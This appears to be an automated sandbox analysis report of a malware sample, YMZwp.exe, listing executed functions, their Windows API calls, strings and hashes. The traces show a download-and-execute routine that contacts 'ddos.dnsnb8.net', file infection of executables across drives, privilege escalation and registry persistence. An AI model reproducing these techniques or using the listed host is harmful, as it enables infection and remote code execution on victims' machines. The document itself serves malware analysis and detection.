                                    callgraph 0 Function_00B369B0 1 Function_00B36734 19 Function_00B36B02 1->19 24 Function_00B36D00 1->24 25 Function_00B36A84 1->25 2 Function_00B36834 3 Function_00B328B8 7 Function_00B32692 3->7 17 Function_00B3239D 3->17 41 Function_00B329E2 3->41 46 Function_00B31E6E 3->46 4 Function_00B31638 12 Function_00B31099 4->12 14 Function_00B31718 4->14 16 Function_00B3139F 4->16 22 Function_00B31581 4->22 47 Function_00B317D0 4->47 53 Function_00B32C48 4->53 5 Function_00B365A6 6 Function_00B367A4 8 Function_00B36012 9 Function_00B31915 10 Function_00B36014 11 Function_00B32D9B 23 Function_00B31000 12->23 48 Function_00B3185B 12->48 13 Function_00B31319 34 Function_00B32CF0 14->34 15 Function_00B3119F 16->13 16->15 30 Function_00B3120E 16->30 17->9 18 Function_00B3189D 17->18 17->41 40 Function_00B36B63 19->40 20 Function_00B36001 28 Function_00B3600A 20->28 21 Function_00B31C81 22->48 23->47 24->0 33 Function_00B36CF2 24->33 24->40 29 Function_00B3680F 25->29 25->33 26 Function_00B31D8A 27 Function_00B31B8A 27->48 31 Function_00B32B8C 39 Function_00B32B7D 31->39 51 Function_00B32845 31->51 32 Function_00B31973 32->48 38 Function_00B36CF8 33->38 35 Function_00B36076 54 Function_00B366C8 35->54 36 Function_00B31DF6 37 Function_00B31AF9 37->4 39->41 40->0 40->2 40->6 41->3 42 Function_00B314E1 42->4 42->37 43 Function_00B32361 43->11 44 Function_00B32D60 45 Function_00B31C68 46->9 46->11 46->21 46->26 46->27 46->36 46->37 46->44 46->45 46->48 49 Function_00B36158 49->54 50 Function_00B3235D 51->7 51->17 52 Function_00B3274A 51->52 52->32 52->48 53->31 53->32 54->19 54->24 54->25

                                    Executed Functions

                                    Function 00B329E2 Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 128stringfileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
                                    • String ID: %s*$C:\$Documents and Settings
                                    • API String ID: 2826467728-110786608
                                    • Opcode ID: 65d3a9104539c0bbc245072a81cb2527e81ac839ee30a5bc635fe435958fcc91
                                    • Instruction ID: 7f8e9c347e89d2dd6d4127f31c1f36d073d839122573dc876db62a07d7b40b15
                                    • Opcode Fuzzy Hash: 65d3a9104539c0bbc245072a81cb2527e81ac839ee30a5bc635fe435958fcc91
                                    • Instruction Fuzzy Hash: 6C4165B2804349AFD721DBA0DC89EDFB7ECEB84715F240869F944D3111FA34D6488BA2
                                    Function 00B31718 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 65timeCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 216 b31718-b31733 GetSystemTimeAsFileTime 217 b31735-b31752 SHSetValueA 216->217 218 b31754-b31758 216->218 219 b317c6-b317cd 217->219 218->219 220 b3175a-b31784 SHGetValueA 218->220 220->219 221 b31786-b317b3 call b32cf0 * 2 220->221 221->219 226 b317b5 221->226 227 b317b7-b317bd 226->227 228 b317bf 226->228 227->219 227->228 228->219
                                    APIs
                                    • GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\YMZwp.exe), ref: 00B31729
                                    • SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 00B3174C
                                    • SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 00B3177C
                                    • __aulldiv.LIBCMT ref: 00B31796
                                    • __aulldiv.LIBCMT ref: 00B317A8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: TimeValue__aulldiv$FileSystem
                                    • String ID: C:\Users\user\AppData\Local\Temp\YMZwp.exe$SOFTWARE\GTplus$Time
                                    • API String ID: 541852442-3330591207
                                    • Opcode ID: 6ce80fe322d487aa958c71a8b650e433ac76e4e5d5c0bbdfa68d18f4bfc53932
                                    • Instruction ID: e6a1317df6c68e693b56c624e81f7f2988d9a7997afc01c37be1488b2c004f1c
                                    • Opcode Fuzzy Hash: 6ce80fe322d487aa958c71a8b650e433ac76e4e5d5c0bbdfa68d18f4bfc53932
                                    • Instruction Fuzzy Hash: 4C1100B6A00209FBDB209B98CC8AFEF7BFCEB44B54F308555F905B6181D6759E448B60
                                    Function 00B32B8C Relevance: 10.6, APIs: 7, Instructions: 74threadstringCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 365 b32b8c-b32bc6 memset GetLogicalDriveStringsA 366 b32c09-b32c28 WaitForMultipleObjects 365->366 367 b32bc8-b32bcc 365->367 370 b32c2a-b32c3a CreateThread 366->370 371 b32c3c-b32c45 366->371 368 b32bfa-b32c07 lstrlen 367->368 369 b32bce-b32bd0 367->369 368->366 368->367 369->368 372 b32bd2-b32bdc GetDriveTypeA 369->372 370->371 372->368 373 b32bde-b32be1 372->373 373->368 374 b32be3-b32bf6 CreateThread 373->374 374->368
                                    APIs
                                    • memset.MSVCRT ref: 00B32BA6
                                    • GetLogicalDriveStringsA.KERNEL32(00000050,?), ref: 00B32BB4
                                    • GetDriveTypeA.KERNEL32(?), ref: 00B32BD3
                                    • CreateThread.KERNEL32(00000000,00000000,Function_00002B7D,?,00000000,00000000), ref: 00B32BEE
                                    • lstrlen.KERNEL32(?), ref: 00B32BFB
                                    • WaitForMultipleObjects.KERNEL32(?,?,00000001,000000FF), ref: 00B32C16
                                    • CreateThread.KERNEL32(00000000,00000000,00B32845,00000000,00000000,00000000), ref: 00B32C3A
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: CreateDriveThread$LogicalMultipleObjectsStringsTypeWaitlstrlenmemset
                                    • String ID:
                                    • API String ID: 1073171358-0
                                    • Opcode ID: d8bbbbc5e2c9936bdfaf52e09ff77f64a8b40c996eef8c98a3110de622933bb5
                                    • Instruction ID: 97a3bea4f58461def3fd2a30e1e7afbdcaaacd4108266113764b8645bb48e3a4
                                    • Opcode Fuzzy Hash: d8bbbbc5e2c9936bdfaf52e09ff77f64a8b40c996eef8c98a3110de622933bb5
                                    • Instruction Fuzzy Hash: 9D21C0B184015CAFEB249F64AC84EAFBBEDFB04744F340529F94293161EB249E06CB60
                                    Function 00B31E6E Relevance: 30.4, APIs: 20, Instructions: 380fileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 16 b31e6e-b31e95 call b32d60 19 b31e97 call b31d8a 16->19 20 b31e9c-b31eaa call b31df6 16->20 19->20 24 b32332 20->24 25 b31eb0-b31ed9 SetFileAttributesA CreateFileA 20->25 27 b32338-b3233b 24->27 25->24 26 b31edf-b31f28 call b31915 SetFilePointer CreateFileMappingA MapViewOfFile 25->26 26->24 36 b31f2e-b31f39 26->36 29 b32346-b32349 27->29 30 b3233d-b32340 UnmapViewOfFile 27->30 32 b32350-b32354 29->32 33 b3234b-b3234e FindCloseChangeNotification 29->33 30->29 34 b32391-b3239a call b32d9b 32->34 35 b32356-b3235b CloseHandle 32->35 33->32 35->34 36->24 38 b31f3f-b31f56 36->38 38->24 40 b31f5c-b31f64 38->40 40->24 41 b31f6a-b31f70 40->41 41->24 42 b31f76-b31f87 call b31c81 41->42 42->24 45 b31f8d-b31fa7 call b3185b call b31c81 42->45 45->24 50 b31fad-b31fb4 45->50 51 b31fb6-b31fc5 call b31af9 50->51 52 b32024-b32045 50->52 51->52 60 b31fc7-b31fd2 51->60 52->24 53 b3204b-b3204e 52->53 55 b32070-b320f4 call b31af9 * 2 call b31c68 * 2 memset * 2 53->55 56 b32050-b32053 53->56 78 b320f5-b320fe 55->78 58 b32056-b3205a 56->58 58->55 61 b3205c-b32061 58->61 60->24 63 b31fd8-b31fe7 60->63 61->24 64 b32067-b3206e 61->64 66 b31fe9-b31fec 63->66 67 b31fef-b32006 call b31af9 63->67 64->58 66->67 73 b32013-b3201e FlushViewOfFile 67->73 74 b32008-b3200e call b31c68 67->74 73->52 74->73 79 b32130-b32139 78->79 80 b32100-b32114 78->80 83 b3213c-b32142 79->83 81 b32116-b3212a 80->81 82 b3212d-b3212e 80->82 81->82 82->78 84 b32144-b32150 83->84 85 b3215c 83->85 86 b32152-b32154 84->86 87 b32157-b3215a 84->87 88 b3215f-b32162 85->88 86->87 87->83 89 b32181-b32184 88->89 90 b32164-b32171 88->90 93 b32186 89->93 94 b3218d-b321ba call b31c68 89->94 91 b32177-b3217e 90->91 92 b3232a-b3232d 90->92 91->89 92->88 93->94 97 b321d3-b3220b call b31c81 call b31c68 94->97 98 b321bc-b321d0 call b31c68 94->98 105 b3221b-b3221e 97->105 106 b3220d-b32218 call b31c68 97->106 98->97 107 b32220-b32223 105->107 108 b32226-b3231a memcpy UnmapViewOfFile FindCloseChangeNotification call b31b8a call b3185b SetFilePointer SetEndOfFile SetFilePointer WriteFile * 2 call b31915 105->108 106->105 107->108 116 b3231f-b32328 CloseHandle 108->116 116->27
                                    APIs
                                    • SetFileAttributesA.KERNEL32(?,00000080,?,00B332B0,00000164,00B32986,?), ref: 00B31EB9
                                    • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00B31ECD
                                    • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 00B31EF3
                                    • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00B31F07
                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000400), ref: 00B31F1D
                                    • FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 00B3201E
                                    • memset.MSVCRT ref: 00B320D8
                                    • memset.MSVCRT ref: 00B320EA
                                    • memcpy.MSVCRT ref: 00B3222D
                                    • UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00B32238
                                    • FindCloseChangeNotification.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00B3224A
                                    • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00B322C6
                                    • SetEndOfFile.KERNEL32(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00B322CB
                                    • SetFilePointer.KERNEL32(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00B322DD
                                    • WriteFile.KERNEL32(000000FF,00B34008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00B322F7
                                    • WriteFile.KERNEL32(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00B3230D
                                    • CloseHandle.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00B32322
                                    • UnmapViewOfFile.KERNEL32(?,?,00B332B0,00000164,00B32986,?), ref: 00B32340
                                    • FindCloseChangeNotification.KERNEL32(?,?,00B332B0,00000164,00B32986,?), ref: 00B3234E
                                    • CloseHandle.KERNEL32(000000FF,?,00B332B0,00000164,00B32986,?), ref: 00B32359
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: File$CloseView$Pointer$ChangeCreateFindHandleNotificationUnmapWritememset$AttributesFlushMappingmemcpy
                                    • String ID:
                                    • API String ID: 3349749541-0
                                    • Opcode ID: 9e3d1af849176e174319a80ee73f181590e637f2d609dbb6b6ef89cda6b70588
                                    • Instruction ID: fa339ac13fe332e3d57c877404ff6e8120d4be5f26ccbe720437fc49e0eae0ba
                                    • Opcode Fuzzy Hash: 9e3d1af849176e174319a80ee73f181590e637f2d609dbb6b6ef89cda6b70588
                                    • Instruction Fuzzy Hash: DEF18D71900608EFCB24DFA8DC85AADBBF5FF08314F2045AAE519A7661D734AD81CF54
                                    Function 00B31973 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 144filesleepmemoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 117 b31973-b3199a PathFileExistsA 118 b319a0-b319aa 117->118 119 b31ac7-b31acc 117->119 120 b319af-b319c2 CreateFileA 118->120 121 b31ad0-b31ad5 119->121 122 b31ace 119->122 123 b319c4-b319d3 Sleep 120->123 124 b31a28-b31a36 GetFileSize 120->124 125 b31af0-b31af6 121->125 126 b31ad7-b31ad9 121->126 122->121 123->120 127 b319d5-b31a0b call b3185b wsprintfA CopyFileA 123->127 128 b31a87-b31a8b 124->128 129 b31a38-b31a3b 124->129 126->125 127->124 141 b31a0d-b31a26 CreateFileA 127->141 130 b31a96-b31a9a 128->130 131 b31a8d-b31a90 FindCloseChangeNotification 128->131 129->128 133 b31a3d-b31a51 VirtualAlloc 129->133 134 b31aad-b31ab1 130->134 135 b31a9c 130->135 131->130 133->128 137 b31a53-b31a57 133->137 139 b31ab3-b31ab6 134->139 140 b31adb-b31ae0 134->140 138 b31aa0-b31aa7 DeleteFileA 135->138 142 b31a80 137->142 143 b31a59-b31a6d ReadFile 137->143 138->134 139->119 144 b31ab8-b31ac1 VirtualFree 139->144 146 b31ae2-b31ae5 140->146 147 b31ae7-b31aec 140->147 141->124 145 b31a9e 141->145 142->128 143->128 148 b31a6f-b31a7e 143->148 144->119 145->138 146->147 147->125 149 b31aee 147->149 148->142 148->143 149->125
                                    APIs
                                    • PathFileExistsA.SHLWAPI(00B34E5C,00000000,C:\Users\user\AppData\Local\Temp\YMZwp.exe), ref: 00B31992
                                    • CreateFileA.KERNEL32(00B34E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00B319BA
                                    • Sleep.KERNEL32(00000064), ref: 00B319C6
                                    • wsprintfA.USER32 ref: 00B319EC
                                    • CopyFileA.KERNEL32(00B34E5C,?,00000000), ref: 00B31A00
                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B31A1E
                                    • GetFileSize.KERNEL32(00B34E5C,00000000), ref: 00B31A2C
                                    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00B31A46
                                    • ReadFile.KERNEL32(00B34E5C,00B34E60,00000000,?,00000000), ref: 00B31A65
                                    • FindCloseChangeNotification.KERNEL32(000000FF), ref: 00B31A90
                                    • DeleteFileA.KERNEL32(?), ref: 00B31AA7
                                    • VirtualFree.KERNEL32(00B34E60,00000000,00008000), ref: 00B31AC1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: File$CreateVirtual$AllocChangeCloseCopyDeleteExistsFindFreeNotificationPathReadSizeSleepwsprintf
                                    • String ID: %s%.8X.data$2$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\YMZwp.exe
                                    • API String ID: 2523042076-2537022715
                                    • Opcode ID: 9c7ed20b32b147a439055b2f6015d1716b9d9b28e2c02b8f9408fc2ac34b8769
                                    • Instruction ID: 0cdf42b188e579a6f9c69afd6d4c9e94e0aece10cad71a605f67c4186f94360c
                                    • Opcode Fuzzy Hash: 9c7ed20b32b147a439055b2f6015d1716b9d9b28e2c02b8f9408fc2ac34b8769
                                    • Instruction Fuzzy Hash: 4D515D71901219EFCB149F98CD84AAEBBFDEB04756F2049A9F525E7190D7709E40CB60
                                    Function 00B328B8 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 100stringCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 150 b328b8-b328ff memset wsprintfA 151 b32905-b3290d 150->151 152 b329db-b329df 150->152 151->152 153 b32913-b32919 151->153 154 b32956-b32965 strrchr 153->154 155 b3291b-b3294c memset wsprintfA call b329e2 153->155 154->152 157 b32967-b32978 lstrcmpiA 154->157 158 b32951 155->158 159 b3297a-b32981 call b31e6e 157->159 160 b32988-b32992 lstrcmpiA 157->160 158->152 165 b32986 159->165 160->152 161 b32994-b3299b 160->161 163 b329ad-b329c9 strstr 161->163 164 b3299d-b329a3 161->164 167 b329d3-b329d6 call b32692 163->167 168 b329cb-b329d1 call b3239d 163->168 164->163 166 b329a5-b329a7 lstrcpy 164->166 165->152 166->163 167->152 168->152
                                    APIs
                                    • memset.MSVCRT ref: 00B328D3
                                    • wsprintfA.USER32 ref: 00B328F7
                                    • memset.MSVCRT ref: 00B32925
                                    • wsprintfA.USER32 ref: 00B32940
                                      • Part of subcall function 00B329E2: memset.MSVCRT ref: 00B32A02
                                      • Part of subcall function 00B329E2: wsprintfA.USER32 ref: 00B32A1A
                                      • Part of subcall function 00B329E2: memset.MSVCRT ref: 00B32A44
                                      • Part of subcall function 00B329E2: lstrlen.KERNEL32(?), ref: 00B32A54
                                      • Part of subcall function 00B329E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 00B32A6C
                                      • Part of subcall function 00B329E2: strrchr.MSVCRT ref: 00B32A7C
                                      • Part of subcall function 00B329E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00B32A9F
                                      • Part of subcall function 00B329E2: lstrlen.KERNEL32(Documents and Settings), ref: 00B32AAE
                                      • Part of subcall function 00B329E2: memset.MSVCRT ref: 00B32AC6
                                      • Part of subcall function 00B329E2: memset.MSVCRT ref: 00B32ADA
                                      • Part of subcall function 00B329E2: FindFirstFileA.KERNEL32(?,?), ref: 00B32AEF
                                      • Part of subcall function 00B329E2: memset.MSVCRT ref: 00B32B13
                                    • strrchr.MSVCRT ref: 00B32959
                                    • lstrcmpiA.KERNEL32(00000001,exe), ref: 00B32974
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
                                    • String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
                                    • API String ID: 3004273771-3412794237
                                    • Opcode ID: c01372d398244cc58e85c6bedb0d50f9db43ab732d567452a80a7cc45c061089
                                    • Instruction ID: 82906e4d7725b31fe2d99c7152cd1405959d9d0136348f341d9d67a46e479c80
                                    • Opcode Fuzzy Hash: c01372d398244cc58e85c6bedb0d50f9db43ab732d567452a80a7cc45c061089
                                    • Instruction Fuzzy Hash: 193173769403196BDB209764DC89FDB77ECDB14710F3405E2F945A3191EAB49AC88BA0
                                    Function 00B31099 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 74stringsleepprocessCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 172 b31099-b310b4 173 b310ba-b310c7 172->173 174 b31199-b3119c 172->174 175 b310c8-b310d4 173->175 176 b31184-b31190 175->176 177 b310da 175->177 176->175 178 b31196-b31198 176->178 179 b31113-b31162 call b3185b wsprintfA * 2 URLDownloadToFileA 177->179 178->174 182 b31168-b31182 lstrlen Sleep 179->182 183 b310dc-b3110d call b31000 WinExec lstrlen 179->183 182->176 182->179 183->178 183->179
                                    APIs
                                      • Part of subcall function 00B3185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,753C8400,http://%s:%d/%s/%s,?,?,?,00B31118), ref: 00B31867
                                      • Part of subcall function 00B3185B: srand.MSVCRT ref: 00B31878
                                      • Part of subcall function 00B3185B: rand.MSVCRT ref: 00B31880
                                      • Part of subcall function 00B3185B: srand.MSVCRT ref: 00B31890
                                      • Part of subcall function 00B3185B: rand.MSVCRT ref: 00B31894
                                    • WinExec.KERNEL32(?,00000005), ref: 00B310F1
                                    • lstrlen.KERNEL32(00B34748), ref: 00B310FA
                                    • wsprintfA.USER32 ref: 00B3112A
                                    • wsprintfA.USER32 ref: 00B31143
                                    • URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 00B3115B
                                    • lstrlen.KERNEL32(ddos.dnsnb8.net,00000000,?,?,00000000,00000000), ref: 00B31169
                                    • Sleep.KERNEL32 ref: 00B31179
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: FileTimelstrlenrandsrandwsprintf$DownloadExecSleepSystem
                                    • String ID: %s%.8X.exe$C:\Users\user\AppData\Local\Temp\$cj/$ddos.dnsnb8.net$http://%s:%d/%s/%s
                                    • API String ID: 1280626985-2217286572
                                    • Opcode ID: 1f5aec21436480bdd19e2fa7482bdd2e8381054b1bd2bad5c3c0b36634259059
                                    • Instruction ID: 5dae200caffff20eca6c6265a9d31cfcecedf195c30ca92981a269001180458e
                                    • Opcode Fuzzy Hash: 1f5aec21436480bdd19e2fa7482bdd2e8381054b1bd2bad5c3c0b36634259059
                                    • Instruction Fuzzy Hash: 11217A75900208BEDB20DBA4DC89BAFBBFCEB05715F3145E5E500A3150DB74AA848FA0
                                    Function 00B31638 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 70stringsynchronizationthreadCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 00B3164F
                                    • GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 00B3165B
                                    • GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\YMZwp.exe,00000104), ref: 00B3166E
                                    • CreateThread.KERNEL32(00000000,00000000,Function_00001099,00000000,00000000,00000000), ref: 00B316AC
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 00B316BD
                                      • Part of subcall function 00B3139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\YMZwp.exe), ref: 00B313BC
                                      • Part of subcall function 00B3139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00B313DA
                                      • Part of subcall function 00B3139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00B31448
                                    • lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\YMZwp.exe), ref: 00B316E5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmpDownload File
                                    • Associated: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
                                    • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\YMZwp.exe$C:\Windows\system32$Documents and Settings
                                    • API String ID: 123563730-1988126829
                                    • Opcode ID: a988fba597b3f64759153775e0a5d8293a2f8747eeba69bca098004d027c13ed
                                    • Instruction ID: 59b71a0053929407f6a64d4d4d5633e1059e37eab133ec7622e78f0413e15059
                                    • Opcode Fuzzy Hash: a988fba597b3f64759153775e0a5d8293a2f8747eeba69bca098004d027c13ed
                                    • Instruction Fuzzy Hash: 8E11B672541214BBCB246BA8AD4EF9F3EEDEB55761F3404A1F209920B0DB749940C7B1
                                    Function 00B31000 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 60fileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 205 b31000-b31023 CreateFileA 206 b31092-b31096 205->206 207 b31025-b31055 GetFileSize CreateFileMappingA MapViewOfFile 205->207 208 b31057-b3105f 207->208 209 b3107b-b31085 207->209 212 b31061-b3106e call b317d0 208->212 213 b31074-b31075 UnmapViewOfFile 208->213 210 b31087-b3108b CloseHandle 209->210 211 b3108d-b31091 CloseHandle 209->211 210->211 211->206 212->213 213->209
                                    APIs
                                    • CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,?,http://%s:%d/%s/%s,00B310E8,?), ref: 00B31018
                                    • GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,753C8400,?,http://%s:%d/%s/%s,00B310E8,?), ref: 00B31029
                                    • CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00B31038
                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,http://%s:%d/%s/%s,00B310E8,?), ref: 00B3104B
                                    • UnmapViewOfFile.KERNEL32(00000000,?,http://%s:%d/%s/%s,00B310E8,?), ref: 00B31075
                                    • CloseHandle.KERNEL32(?,?,http://%s:%d/%s/%s,00B310E8,?), ref: 00B3108B
